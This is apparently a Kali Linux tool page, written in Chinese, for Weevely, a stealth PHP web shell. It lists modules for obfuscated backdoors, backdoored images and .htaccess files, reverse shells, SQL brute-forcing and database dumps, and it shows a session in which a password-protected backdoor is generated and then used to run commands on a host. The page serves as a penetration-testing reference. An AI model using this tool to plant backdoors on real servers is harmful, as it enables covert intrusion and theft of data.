Weevely包装说明
Weevely是一个隐形的PHP网页外壳,模拟的telnet类似的连接。它是Web应用程序开发后的一个重要工具,并且可以用作隐形后门或作为网络的外壳,以管理合法的网络账户,甚至免费托管的。
资料来源:https://github.com/epinna/Weevely/
Weevely首页 | 卡利Weevely回购
- 作者:Weevely开发商
- 许可:GPL第二版
包含在weevely包工具
weevely - 隐形的小网站壳
[email protected]:~# weevely help
+--------------------+------------------------------------------------------+
| generator | description |
+--------------------+------------------------------------------------------+
| :generate.img | Backdoor existing image and create related .htaccess |
| :generate.htaccess | Generate backdoored .htaccess |
| :generate.php | Generate obfuscated PHP backdoor |
+--------------------+------------------------------------------------------+
+----------------------+------------------------------------------------------------------------------+
| module | description |
+----------------------+------------------------------------------------------------------------------+
| :audit.systemfiles | Find wrong system files permissions |
| :audit.userfiles | Guess files with wrong permissions in users home folders |
| :audit.mapwebfiles | Crawl and enumerate web folders files permissions |
| :audit.phpconf | Check php security configurations |
| :audit.etcpasswd | Enumerate users and /etc/passwd content |
| :shell.sh | Execute system shell command |
| :shell.php | Execute PHP statement |
| :system.info | Collect system informations |
| :find.name | Find files with matching name |
| :find.perms | Find files with write, read, execute permissions |
| :find.suidsgid | Find files with superuser flags |
| :backdoor.reversetcp | Send reverse TCP shell |
| :backdoor.tcp | Open a shell on TCP port |
| :bruteforce.sql | Bruteforce SQL username |
| :bruteforce.sqlusers | Bruteforce all SQL users |
| :file.read | Read remote file |
| :file.webdownload | Download web URL to remote filesystem |
| :file.mount | Mount remote filesystem using HTTPfs |
| :file.enum | Enumerate remote paths |
| :file.upload2web | Upload binary/ascii file into remote web folders and guess corresponding url |
| :file.check | Check remote files type, md5 and permission |
| :file.rm | Remove remote files and folders |
| :file.ls | List directory contents |
| :file.touch | Change file timestamps |
| :file.download | Download binary/ascii files from the remote filesystem |
| :file.upload | Upload binary/ascii file into remote filesystem |
| :file.edit | Edit remote file |
| :sql.console | Run SQL console or execute single queries |
| :sql.dump | Get SQL database dump |
| :net.ifaces | Print interfaces addresses |
| :net.proxy | Install and run Proxy to tunnel traffic through target |
| :net.phpproxy | Install remote PHP proxy |
| :net.scan | Port scan open TCP ports |
+----------------------+------------------------------------------------------------------------------+
Hint: Run ':help <module>' to print detailed usage informations.weevely用法示例
生成一个PHP后门(产生)与给定的密码(s3cr3t)的保护。
[email protected]:~# weevely generate s3cr3t
[generate.php] Backdoor file 'weevely.php' created with password 's3cr3t'[email protected]:~# weevely http://192.168.1.202/weevely.php s3cr3t
________ __
| | | |----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|____|____|___/|____|__|___ | v1.1
|_____|
Stealth tiny web shell
[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.1.202/weevely.session'
[email protected]:/var/www $ uname
Linux
[email protected]:/var/www $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)